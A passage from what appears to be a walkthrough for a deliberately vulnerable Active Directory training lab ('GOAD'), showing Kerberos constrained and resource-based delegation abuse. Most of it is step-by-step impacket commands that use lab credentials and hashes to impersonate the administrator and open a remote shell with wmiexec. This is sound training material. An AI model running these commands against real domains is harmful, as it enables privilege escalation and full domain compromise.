- Once that done, you have the forwardable ticket to pass to s4u2proxy, and we even can change the request service with -altservice
# add computer X (rbcd_const) addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.sevenkingdoms.local/arya.stark:Needle' # add rbcd from X (rbcd_const) to constrained (castelblack) rbcd.py -delegate-from 'rbcd_const$' -delegate-to 'castelblack$' -dc-ip 192.168.56.11 -action 'write' -hashes ':b52ee55ea1b9fb81de8c4f0064fa9301' north.sevenkingdoms.local/'castelblack$' |
- Do the s4u2self followed by the s4u2proxy on castelblack (this is the classic RBCD attack)
# s4u2self on X (rbcd_const) getST.py -self -impersonate "administrator" -dc-ip 192.168.56.11 north.sevenkingdoms.local/'rbcd_const$':'rbcdpass' # s4u2proxy from X (rbcd_const) to constrained (castelblack) getST.py -impersonate "administrator" -spn "host/castelblack" -additional-ticket 'administrator@rbcd_const$@NORTH.SEVENKINGDOMS.LOCAL.ccache' -dc-ip 192.168.56.11 north.sevenkingdoms.local/'rbcd_const$':'rbcdpass' |
- You could also do the 2 (s4u2self + s4u2proxy) in one command :
getST.py -spn 'host/castelblack' -impersonate Administrator -dc-ip 192.168.56.11 north.sevenkingdoms.local/'rbcd_const$':'rbcdpass' |
- And launch the s4uProxy with the forwardable ticket
# s4u2proxy from constrained (castelblack) to target (winterfell) - with altservice to change the SPN in use getST.py -impersonate "administrator" -spn "http/winterfell" -altservice "cifs/winterfell" -additional-ticket 'administrator@host_castelblack@NORTH.SEVENKINGDOMS.LOCAL.ccache' -dc-ip 192.168.56.11 -hashes ':b52ee55ea1b9fb81de8c4f0064fa9301' north.sevenkingdoms.local/'castelblack$' export KRB5CCNAME=/workspace/administrator@cifs_winterfell@NORTH.SEVENKINGDOMS.LOCAL.ccache wmiexec.py -k -no-pass north.sevenkingdoms.local/administrator@winterfell |
- After the exploit a little clean up of the lab, flush the rbcd entry and delete the computer account with a domain admin:
rbcd.py -delegate-to 'castelblack$' -delegate-from 'rbcd_const$' -dc-ip 192.168.56.11 -action 'flush' -hashes ':b52ee55ea1b9fb81de8c4f0064fa9301' north.sevenkingdoms.local/'castelblack$' addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.sevenkingdoms.local/eddard.stark:FightP3aceAndHonor!' -delete |
Resource Based Constrained Delegation
- Resource Based Constrained delegation (RBCD)
- You can abuse RBCD when you can edit the attribute : msDS-AllowedToActOnBehalfOfOtherIdentity
A computer account can edit his own attribute msDS-AllowedToActOnBehalfOfOtherIdentity This is usefull when you do ldaps NTLM relay (like in the drop-the-mic attack path), you can then edit the computer attribute and launch an RBCD exploitation.
- An example of exploitation is when you got genericAll or genericWrite ACL on a Computer.
- You can find this in the lab when you look at the acl on users.
- We can see that stannis.baratheon got a generic Write on kingslanding
- The RBCD exploitation append with the following commands :
- Create a computer X (rbcd$)
addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingslanding.sevenkingdoms.local 'sevenkingdoms.local/stannis.baratheon:Drag0nst0ne' |
- Add delegation write on our target from X (rbcd$)
rbcd.py -delegate-from 'rbcd$' -delegate-to 'kingslanding$' -dc-ip 'kingslanding.sevenkingdoms.local' -action 'write' sevenkingdoms.local/stannis.baratheon:Drag0nst0ne |
- Now X (rbcd$) got delegation permission on our target, you can now do an s4u2self query followed by an S4u2proxy.
- This will result in an administrator permission on kingslanding.
getST.py -spn 'cifs/kingslanding.sevenkingdoms.local' -impersonate Administrator -dc-ip 'kingslanding.sevenkingdoms.local' 'sevenkingdoms.local/rbcd$:rbcdpass' export KRB5CCNAME=/workspace/rbcd/Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache wmiexec.py -k -no-pass @kingslanding.sevenkingdoms.local |
- After the exploit a little clean up of the lab, flush the rbcd entry and delete the computer account with a domain admin:
rbcd.py -delegate-from 'rbcd$' -delegate-to 'kingslanding$' -dc-ip 'kingslanding.sevenkingdoms.local' -action 'flush' sevenkingdoms.local/stannis.baratheon:Drag0nst0ne addcomputer.py -computer-name 'rbcd$' -computer-pass 'rbcdpass' -dc-host kingslanding.sevenkingdoms.local 'sevenkingdoms.local/cersei.lannister:il0vejaime' -delete |
Ressources – go further
- https://www.thehacker.recipes/ad/movement/kerberos/delegations
- https://www.notsoshant.io/blog/attacking-kerberos-constrained-delegation/
- https://sensepost.com/blog/2020/chaining-multiple-techniques-and-tools-for-domain-takeover-using-rbcd/
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse
- https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/delegation-abuse
- And i recommend you to take a look at charlie’s talk about delegation : https://www.thehacker.recipes/ad/movement/kerberos/delegations#talk
Next time we will have fun with ACL : : (Goad pwning part11) 🙂